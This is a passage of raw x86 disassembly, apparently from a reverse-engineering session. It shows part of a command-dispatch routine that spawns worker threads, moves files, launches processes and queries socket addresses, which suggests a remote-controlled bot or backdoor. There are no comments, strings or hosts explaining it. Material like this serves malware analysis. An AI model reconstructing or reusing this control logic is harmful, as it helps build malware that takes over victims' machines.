; ---------------------------------------------------------------------------
loc_412D4E: ; CODE XREF: sub_40FCA3+30B9�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_412D56: ; CODE XREF: sub_40FCA3+3098�j
cmp [ebp+var_5A0], ebx
jz short loc_412D4E
jmp loc_4137B8
; ---------------------------------------------------------------------------
loc_412D63: ; CODE XREF: sub_40FCA3+2833�j
; sub_40FCA3+284A�j
push 8
call sub_417661
push dword ptr [ebp+lpNewFileName]
mov dword ptr [ebp+arg_8], eax
call sub_417ECF
add eax, dword ptr [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 3E8h
jle short loc_412DB3
push dword ptr [ebp+arg_8]
lea eax, [ebp+var_2EC]
push 4393B0h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
jmp loc_4141E2
; ---------------------------------------------------------------------------
loc_412DB3: ; CODE XREF: sub_40FCA3+30DC�j
push edi
call sub_417ECF
push dword ptr [ebp+lpNewFileName]
mov [ebp+var_488], eax
call sub_417ECF
push [ebp+addr]
mov [ebp+var_470], eax
call sub_417ECF
add esp, 0Ch
cmp eax, 5
mov [ebp+var_484], eax
jnb short loc_412DEC
push 5
pop eax
mov [ebp+var_484], eax
loc_412DEC: ; CODE XREF: sub_40FCA3+313E�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_412DF9
mov [ebp+var_484], ecx
loc_412DF9: ; CODE XREF: sub_40FCA3+314E�j
push dword ptr [ebp+arg_10]
call sub_417ECF
mov [ebp+var_480], eax
mov eax, 2710h
cmp [ebp+var_480], eax
pop ecx
jbe short loc_412E1B
mov [ebp+var_480], eax
loc_412E1B: ; CODE XREF: sub_40FCA3+3170�j
or [ebp+var_46C], 0FFFFFFFFh
cmp dword ptr unk_42B620, ebx
mov dword ptr [ebp+arg_10], ebx
jz short loc_412E71
mov [ebp+arg_24], 42B620h
loc_412E34: ; CODE XREF: sub_40FCA3+31B0�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_412E57
add [ebp+arg_24], 40h
inc dword ptr [ebp+arg_10]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_412E34
jmp short loc_412E71
; ---------------------------------------------------------------------------
loc_412E57: ; CODE XREF: sub_40FCA3+31A2�j
mov eax, dword ptr [ebp+arg_10]
mov ecx, eax
mov [ebp+var_46C], eax
shl ecx, 6
mov ecx, [ecx+42B620h]
mov [ebp+var_488], ecx
loc_412E71: ; CODE XREF: sub_40FCA3+3188�j
; sub_40FCA3+31B2�j
cmp [ebp+var_488], ebx
jnz short loc_412E83
push 439368h
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_412E83: ; CODE XREF: sub_40FCA3+31D4�j
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov dword ptr [ebp+lpNewFileName], edi
jz short loc_412EBE
cmp byte ptr [edi], 23h
jz short loc_412EBE
push edi
lea eax, [ebp+var_59C]
push 10h
push eax
call sub_417EDA
push 78h
push edi
call sub_419690
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_45C], eax
jmp loc_412F92
; ---------------------------------------------------------------------------
loc_412EBE: ; CODE XREF: sub_40FCA3+31E9�j
; sub_40FCA3+31EE�j
cmp [ebp+var_A5F], bl
jnz short loc_412EE0
cmp [ebp+var_A5E], bl
jnz short loc_412EE0
cmp [ebp+var_A4E], bl
jnz short loc_412EE0
push 439320h
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_412EE0: ; CODE XREF: sub_40FCA3+3221�j
; sub_40FCA3+3229�j ...
push 10h
lea eax, [ebp+addr]
pop edi
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
mov [ebp+addr], edi
push [ebp+s] ; s
call getsockname ; getsockname
mov al, [ebp+var_A5F]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and dword ptr [ebp+name.sa_data+2], eax
push dword ptr [ebp+name.sa_data+2] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_59C]
push eax
call sub_419300
add esp, 0Ch
cmp [ebp+var_A4E], bl
jz short loc_412F8C
xor eax, eax
cmp [ebp+var_A5F], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_59C]
push eax
call sub_419570
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_412F80
loc_412F5E: ; CODE XREF: sub_40FCA3+32DB�j
cmp eax, ebx
jz short loc_412F80
mov byte ptr [eax], 78h
lea eax, [ebp+var_59C]
push 30h
push eax
call sub_419570
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_412F5E
loc_412F80: ; CODE XREF: sub_40FCA3+32B9�j
; sub_40FCA3+32BD�j
mov [ebp+var_45C], 1
jmp short loc_412F92
; ---------------------------------------------------------------------------
loc_412F8C: ; CODE XREF: sub_40FCA3+3293�j
mov [ebp+var_45C], ebx
loc_412F92: ; CODE XREF: sub_40FCA3+3216�j
; sub_40FCA3+32E7�j
mov eax, [ebp+s]
push [ebp+hFile]
mov [ebp+var_48C], eax
mov eax, [ebp+var_4]
mov [ebp+var_464], eax
mov eax, [ebp+var_8]
mov [ebp+var_460], eax
mov edi, 80h
lea eax, [ebp+var_58C]
push edi
push eax
call sub_417EDA
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_412FE3
loc_412FD0: ; CODE XREF: sub_40FCA3+3363�j
push esi
loc_412FD1: ; CODE XREF: sub_40FCA3+334D�j
lea eax, [ebp+var_50C]
push edi
push eax
call sub_417EDA
add esp, 0Ch
jmp short loc_41300E
; ---------------------------------------------------------------------------
loc_412FE3: ; CODE XREF: sub_40FCA3+332B�j
mov eax, dword ptr [ebp+lpNewFileName]
cmp eax, ebx
jz short loc_412FF2
cmp byte ptr [eax], 23h
jnz short loc_412FF2
push eax
jmp short loc_412FD1
; ---------------------------------------------------------------------------
loc_412FF2: ; CODE XREF: sub_40FCA3+3345�j
; sub_40FCA3+334A�j
mov esi, 431694h
push 440F9Ch
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_412FD0
mov [ebp+var_50C], bl
loc_41300E: ; CODE XREF: sub_40FCA3+333E�j
cmp [ebp+var_45C], ebx
mov eax, 439314h
jnz short loc_413020
mov eax, 439308h
loc_413020: ; CODE XREF: sub_40FCA3+3376�j
push [ebp+var_470]
lea ecx, [ebp+var_59C]
push [ebp+var_480]
push [ebp+var_484]
push [ebp+var_488]
push ecx
push eax
lea eax, [ebp+var_2EC]
push 439298h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 8
push eax
call sub_41741F
add esp, 2Ch
mov [ebp+var_47C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_59C]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_4082D7 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_47C]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4130B1
call GetLastError
push eax
push 439250h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_4130A9: ; CODE XREF: sub_40FCA3+3414�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4130B1: ; CODE XREF: sub_40FCA3+33F3�j
cmp [ebp+var_458], ebx
jz short loc_4130A9
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_4130BE: ; CODE XREF: sub_40FCA3+27F3�j
; sub_40FCA3+280A�j
push edi
call sub_417ECF
imul eax, 234h
pop ecx
cmp [eax+44B880h], bl
jz loc_415F22
cmp [ebp+var_C], ebx
jz loc_415F22
push dword ptr [ebp+lpNewFileName]
call sub_4180D0
push edi
mov esi, eax
call sub_4180D0
push dword ptr [ebp+arg_8]
add esi, eax
call sub_4180D0
add eax, [ebp+var_C]
push [ebp+addr]
lea eax, [eax+esi+2]
push eax
call sub_417F60
mov esi, eax
lea eax, [ebp+var_2EC]
push esi
push 439244h
push eax
call sub_41795B
add esp, 20h
cmp esi, ebx
jz loc_415F22
push edi
call sub_417ECF
test eax, eax
pop ecx
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
push ebx ; int
lea eax, [ebp+var_2EC]
push ebx ; int
push eax ; int
push dword ptr [ebp+lpNewFileName] ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E1D6
push edi
call sub_417ECF
imul eax, 234h
add esp, 18h
cmp byte ptr [eax+44B668h], 73h
jnz loc_415F22
push esi
push edi
call sub_417ECF
imul eax, 234h
pop ecx
add eax, 44B880h
push eax
push dword ptr [ebp+lpNewFileName]
push 439234h
loc_4131A6: ; CODE XREF: sub_40FCA3+35FD�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
jmp loc_415F1F
; ---------------------------------------------------------------------------
loc_4131D0: ; CODE XREF: sub_40FCA3+27C5�j
; sub_40FCA3+27DC�j
push edi
call sub_417ECF
imul eax, 234h
pop ecx
cmp [eax+44B880h], bl
jz loc_415F22
cmp [ebp+var_C], ebx
jz loc_415F22
push dword ptr [ebp+lpNewFileName]
call sub_4180D0
push edi
mov esi, eax
call sub_4180D0
push dword ptr [ebp+arg_8]
add esi, eax
call sub_4180D0
add eax, [ebp+var_C]
push [ebp+addr]
lea eax, [eax+esi+2]
push eax
call sub_417F60
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_415F22
push edi
call sub_417ECF
test eax, eax
pop ecx
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
push ebx ; int
push ebx ; int
push esi ; int
push dword ptr [ebp+lpNewFileName] ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E1D6
push edi
call sub_417ECF
imul eax, 234h
add esp, 18h
cmp byte ptr [eax+44B668h], 73h
jnz loc_415F22
push esi
push edi
call sub_417ECF
imul eax, 234h
pop ecx
add eax, 44B880h
push eax
push dword ptr [ebp+lpNewFileName]
push 439224h
jmp loc_4131A6
; ---------------------------------------------------------------------------
loc_4132A5: ; CODE XREF: sub_40FCA3+2797�j
; sub_40FCA3+27AE�j
push edi ; cp
call inet_addr_0
push dword ptr [ebp+lpNewFileName]
mov dword ptr [ebp+in.S_un], eax
call sub_417ECF
push [ebp+addr]
mov [ebp+var_3A8], eax
call sub_417ECF
mov esi, [ebp+s]
push 7Fh
push [ebp+hFile]
mov [ebp+var_3A4], eax
lea eax, [ebp+var_428]
mov [ebp+var_42C], esi
push eax
call sub_419300
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_394], edi
push [ebp+var_3A4]
mov [ebp+var_390], eax
push [ebp+var_3A8]
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_2EC]
push 4391D8h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 8
push eax
call sub_41741F
add esp, 20h
mov [ebp+var_3A0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_42C]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_4169D6 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_3A0]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4133A4
call GetLastError
push eax
push 439188h
loc_41337D: ; CODE XREF: sub_40FCA3+37EA�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 0Ch
loc_41338C: ; CODE XREF: sub_40FCA3+3709�j
; sub_40FCA3+37FF�j
cmp [ebp+var_8], ebx
jnz loc_4105FA
push ebx
push edi
jmp loc_4137C5
; ---------------------------------------------------------------------------
loc_41339C: ; CODE XREF: sub_40FCA3+3707�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4133A4: ; CODE XREF: sub_40FCA3+36CC�j
cmp [ebp+var_38C], ebx
jz short loc_41339C
jmp short loc_41338C
; ---------------------------------------------------------------------------
loc_4133AE: ; CODE XREF: sub_40FCA3+2769�j
; sub_40FCA3+2780�j
push edi
call sub_417ECF
push 7Fh
mov [ebp+var_1250], eax
push dword ptr [ebp+lpNewFileName]
lea eax, [ebp+var_1354]
push eax
call sub_419300
push [ebp+addr]
call sub_417ECF
push [ebp+hFile]
mov esi, [ebp+s]
mov [ebp+var_1254], eax
lea eax, [ebp+var_12D4]
push 80h
push eax
mov [ebp+var_135C], esi
call sub_417EDA
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_1240], eax
push [ebp+var_1254]
lea eax, [ebp+var_1354]
mov [ebp+var_1244], edi
push eax
push [ebp+var_1250]
push esi ; s
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_2EC]
push 439138h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 12h
push eax
call sub_41741F
add esp, 24h
mov [ebp+var_124C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_135C]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40852E ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_124C]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_41349A
call GetLastError
push eax
push 4390E0h
jmp loc_41337D
; ---------------------------------------------------------------------------
loc_413492: ; CODE XREF: sub_40FCA3+37FD�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_41349A: ; CODE XREF: sub_40FCA3+37DC�j
cmp [ebp+var_123C], ebx
jz short loc_413492
jmp loc_41338C
; ---------------------------------------------------------------------------
loc_4134A7: ; CODE XREF: sub_40FCA3+273B�j
; sub_40FCA3+2752�j
push 0FFh
lea eax, [ebp+var_E94]
push edi
push eax
call sub_419300
push 0FFh
lea eax, [ebp+var_D94]
push dword ptr [ebp+lpNewFileName]
push eax
call sub_419300
push [ebp+addr]
mov [ebp+var_C90], ebx
call sub_417ECF
mov [ebp+var_C8C], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_413503
push 10h
push ebx
push eax
call sub_418EC0
add esp, 0Ch
mov [ebp+var_C84], eax
jmp short loc_413509
; ---------------------------------------------------------------------------
loc_413503: ; CODE XREF: sub_40FCA3+384A�j
mov [ebp+var_C84], ebx
loc_413509: ; CODE XREF: sub_40FCA3+385E�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_413520
push esi
call sub_417ECF
pop ecx
mov [ebp+var_C88], eax
jmp short loc_413526
; ---------------------------------------------------------------------------
loc_413520: ; CODE XREF: sub_40FCA3+386C�j
mov [ebp+var_C88], ebx
loc_413526: ; CODE XREF: sub_40FCA3+387B�j
movzx eax, [ebp+var_A5B]
mov esi, [ebp+s]
push 7Fh
push [ebp+hFile]
mov [ebp+var_C80], eax
lea eax, [ebp+var_F14]
mov [ebp+var_F18], esi
push eax
call sub_419300
mov eax, [ebp+var_4]
push dword ptr [ebp+lpNewFileName]
mov [ebp+var_C78], eax
mov eax, [ebp+var_8]
mov [ebp+var_C7C], eax
push edi
lea eax, [ebp+var_2EC]
push 4390A0h
push eax
call sub_41795B
push esi
lea eax, [ebp+var_2EC]
push 18h
push eax
call sub_41741F
add esp, 28h
mov [ebp+var_C94], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_F18]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40D66D ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_C94]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4135D7
call GetLastError
push eax
push 439050h
jmp loc_4137A9
; ---------------------------------------------------------------------------
loc_4135CF: ; CODE XREF: sub_40FCA3+393A�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4135D7: ; CODE XREF: sub_40FCA3+3919�j
cmp [ebp+var_C74], ebx
jz short loc_4135CF
jmp loc_4137B8
; ---------------------------------------------------------------------------
loc_4135E4: ; CODE XREF: sub_40FCA3+270D�j
; sub_40FCA3+2724�j
push 7Fh
lea eax, [ebp+var_1C0C]
pop esi
push esi
push edi
push eax
call sub_419300
push esi
lea eax, [ebp+var_1B8C]
push dword ptr [ebp+lpNewFileName]
push eax
call sub_419300
push esi
lea eax, [ebp+var_1B0C]
push [ebp+addr]
push eax
call sub_419300
push esi
lea eax, [ebp+var_1A8C]
push [ebp+hFile]
push eax
call sub_419300
mov eax, [ebp+var_4]
push [ebp+addr]
mov esi, [ebp+s]
mov [ebp+var_1A08], eax
mov eax, [ebp+var_8]
push dword ptr [ebp+lpNewFileName]
mov [ebp+var_1A04], eax
lea eax, [ebp+var_2EC]
push edi
push 439010h
push eax
mov [ebp+var_1C10], esi
call sub_41795B
add esp, 44h
lea eax, [ebp+var_2EC]
push ebx
push 0Dh
push eax
call sub_41741F
add esp, 0Ch
mov [ebp+var_1A0C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_1C10]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_401D6B ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_1A0C]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4136BE
call GetLastError
push eax
push 438FC8h
jmp loc_4137A9
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_40FCA3+3A21�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4136BE: ; CODE XREF: sub_40FCA3+3A00�j
cmp [ebp+var_1A00], ebx
jz short loc_4136B6
jmp loc_4137B8
; ---------------------------------------------------------------------------
loc_4136CB: ; CODE XREF: sub_40FCA3+26C8�j
; sub_40FCA3+26DF�j ...
push 7Fh
lea eax, [ebp+var_1E9C]
pop esi
push esi
push edi
push eax
call sub_419300
push esi
lea eax, [ebp+var_1E1C]
push dword ptr [ebp+lpNewFileName]
push eax
call sub_419300
push esi
lea eax, [ebp+var_1D9C]
push [ebp+addr]
push eax
call sub_419300
push esi
lea eax, [ebp+var_1D1C]
push [ebp+hFile]
push eax
call sub_419300
push 20h
lea eax, [ebp+var_1C9C]
push dword ptr [ebp+arg_8]
push eax
call sub_419300
mov eax, [ebp+var_4]
push [ebp+addr]
mov esi, [ebp+s]
mov [ebp+var_1C1C], eax
mov eax, [ebp+var_8]
push dword ptr [ebp+lpNewFileName]
mov [ebp+var_1C18], eax
lea eax, [ebp+var_2EC]
push edi
push 438F88h
push eax
mov [ebp+var_1EA4], esi
call sub_41795B
add esp, 50h
lea eax, [ebp+var_2EC]
push ebx
push 0Ah
push eax
call sub_41741F
add esp, 0Ch
mov [ebp+var_1EA0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_1EA4]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_401000 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_1EA0]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4137E0
call GetLastError
push eax
push 438F40h
loc_4137A9: ; CODE XREF: sub_40FCA3+30A6�j
; sub_40FCA3+3927�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 0Ch
loc_4137B8: ; CODE XREF: sub_40FCA3+30BB�j
; sub_40FCA3+393C�j ...
cmp [ebp+var_8], ebx
jnz loc_4105FA
push ebx
push [ebp+var_4]
loc_4137C5: ; CODE XREF: sub_40FCA3+36F4�j
lea eax, [ebp+var_2EC]
push eax
push [ebp+hFile]
push esi
jmp loc_412B11
; ---------------------------------------------------------------------------
loc_4137D8: ; CODE XREF: sub_40FCA3+3B43�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4137E0: ; CODE XREF: sub_40FCA3+3AF8�j
cmp [ebp+var_1C14], ebx
jz short loc_4137D8
jmp short loc_4137B8
; ---------------------------------------------------------------------------
loc_4137EA: ; CODE XREF: sub_40FCA3+269A�j
; sub_40FCA3+26B1�j
push 7Fh
lea eax, [ebp+var_1760]
push edi
push eax
call sub_419300
push dword ptr [ebp+lpNewFileName]
call sub_417ECF
push 3Fh
mov [ebp+var_1610], eax
push [ebp+addr]
lea eax, [ebp+var_16E0]
push eax
call sub_419300
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_413838
push 3Fh
lea eax, [ebp+var_16A0]
push esi
push eax
call sub_419300
add esp, 0Ch
loc_413838: ; CODE XREF: sub_40FCA3+3B81�j
lea eax, [ebp+var_16E0]
mov [ebp+var_160C], 1
push eax
lea eax, [ebp+var_1760]
push [ebp+var_1610]
push eax
lea eax, [ebp+var_2EC]
push 438F00h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 1Ah
push eax
call sub_41741F
add esp, 20h
mov [ebp+var_1608], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_1764]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40F8D6 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_1608]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4138C7
call GetLastError
push eax
push 438EB8h
jmp loc_412712
; ---------------------------------------------------------------------------
loc_4138BF: ; CODE XREF: sub_40FCA3+3C2A�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4138C7: ; CODE XREF: sub_40FCA3+3C09�j
cmp [ebp+var_1604], ebx
jz short loc_4138BF
jmp loc_412721
; ---------------------------------------------------------------------------
loc_4138D4: ; CODE XREF: sub_40FCA3+265A�j
; sub_40FCA3+2671�j
push dword ptr [ebp+lpNewFileName]
call sub_417ECF
cmp eax, ebx
pop ecx
mov [ebp+var_7D4], eax
jle loc_4139C4
mov esi, 80h
push edi
lea eax, [ebp+var_95C]
push esi
push eax
call sub_417EDA
xor eax, eax
cmp [ebp+var_A4E], bl
push [ebp+hFile]
setnz al
mov [ebp+var_7D0], eax
mov eax, [ebp+s]
mov [ebp+var_960], eax
lea eax, [ebp+var_85C]
push esi
push eax
call sub_417EDA
mov eax, [ebp+var_4]
push dword ptr [ebp+lpNewFileName]
mov [ebp+var_7CC], eax
mov eax, [ebp+var_8]
mov [ebp+var_7C8], eax
push edi
push 438E78h
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
push ebx
lea eax, [ebp+var_2EC]
push 0Fh
push eax
call sub_41741F
add esp, 38h
mov [ebp+var_7DC], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_960]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_401444 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_7DC]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4139B7
call GetLastError
push eax
push 438E30h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_4139AF: ; CODE XREF: sub_40FCA3+3D1A�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4139B7: ; CODE XREF: sub_40FCA3+3CF9�j
cmp [ebp+var_7C4], ebx
jz short loc_4139AF
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_4139C4: ; CODE XREF: sub_40FCA3+3C42�j
push 438DE8h
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_4139CE: ; CODE XREF: sub_40FCA3+262C�j
; sub_40FCA3+2643�j
push dword ptr [ebp+lpNewFileName] ; lpNewFileName
push edi ; lpExistingFileName
call MoveFileA ; MoveFileA
test eax, eax
jz short loc_4139FE
push dword ptr [ebp+lpNewFileName]
lea eax, [ebp+var_2EC]
push edi
push 438DB0h
push 200h
push eax
call sub_417EDA
add esp, 14h
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_4139FE: ; CODE XREF: sub_40FCA3+3D37�j
push 438D94h
call sub_40B377
push eax
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
add esp, 10h
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_413A22: ; CODE XREF: sub_40FCA3+25FE�j
; sub_40FCA3+2615�j
push edi
lea eax, [ebp+var_1574]
push 104h
push eax
call sub_417EDA
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_413A5C
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz short loc_413A5C
push eax
lea eax, [ebp+var_1470]
push eax
call sub_41795B
pop ecx
pop ecx
loc_413A5C: ; CODE XREF: sub_40FCA3+3D97�j
; sub_40FCA3+3DA8�j
push [ebp+hFile]
lea eax, [ebp+var_15F4]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+s]
mov [ebp+var_15F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_1368], eax
mov eax, [ebp+var_8]
mov [ebp+var_1364], eax
lea eax, [ebp+var_1470]
push eax
lea eax, [ebp+var_1574]
push eax
push 438D54h
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
push ebx
lea eax, [ebp+var_2EC]
push 1Eh
push eax
call sub_41741F
add esp, 2Ch
mov [ebp+var_136C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_15F8]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_409726 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_136C]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_413B21
call GetLastError
push eax
push 438D08h
loc_413B05: ; CODE XREF: sub_40FCA3+A5B�j
; sub_40FCA3+A81�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 0Ch
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_413B19: ; CODE XREF: sub_40FCA3+3E84�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_413B21: ; CODE XREF: sub_40FCA3+3E54�j
cmp [ebp+var_1360], ebx
jz short loc_413B19
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_413B2E: ; CODE XREF: sub_40FCA3+25D0�j
; sub_40FCA3+25E7�j
push 44h
lea eax, [ebp+StartupInfo]
pop esi
push esi
push ebx
push eax
call sub_4179E0
mov [ebp+StartupInfo.cb], esi
xor esi, esi
inc esi
push edi
mov [ebp+StartupInfo.dwFlags], esi
mov [ebp+StartupInfo.wShowWindow], bx
call sub_417ECF
add esp, 10h
cmp eax, esi
jnz short loc_413B6B
mov [ebp+StartupInfo.wShowWindow], 5
loc_413B6B: ; CODE XREF: sub_40FCA3+3EBD�j
cmp [ebp+var_C], ebx
jz loc_412721
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_412721
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push ebx ; lpCurrentDirectory
push ebx ; lpEnvironment
push 28h ; dwCreationFlags
push esi ; bInheritHandles
push ebx ; lpThreadAttributes
push ebx ; lpProcessAttributes
push edi ; lpCommandLine
push ebx ; lpApplicationName
call CreateProcessA ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2EC]
jnz short loc_413BBC
push 438CD4h
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_413BBC: ; CODE XREF: sub_40FCA3+3F0D�j
push edi
push 438CACh
jmp loc_412718
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_40FCA3+25A2�j
; sub_40FCA3+25B9�j
push dword ptr [ebp+lpNewFileName]
push 4315F8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413D3D
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA ; GetTempPathA
push 0FFh
lea eax, [ebp+var_E94]
push edi
push eax
call sub_419300
lea eax, [ebp+var_BF0]
push eax
push [ebp+s]
call sub_416550
push eax
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_D94]
push 438CA0h
push eax
call sub_41795B
mov eax, [ebp+esi+var_88]
add esp, 24h
cmp eax, ebx
mov [ebp+var_C90], 1
mov [ebp+var_C8C], ebx
jz short loc_413C5C
push 10h
push ebx
push eax
call sub_418EC0
add esp, 0Ch
mov [ebp+var_C84], eax
jmp short loc_413C62
; ---------------------------------------------------------------------------
loc_413C5C: ; CODE XREF: sub_40FCA3+3FA3�j
mov [ebp+var_C84], ebx
loc_413C62: ; CODE XREF: sub_40FCA3+3FB7�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_413C7C
push esi
call sub_417ECF
pop ecx
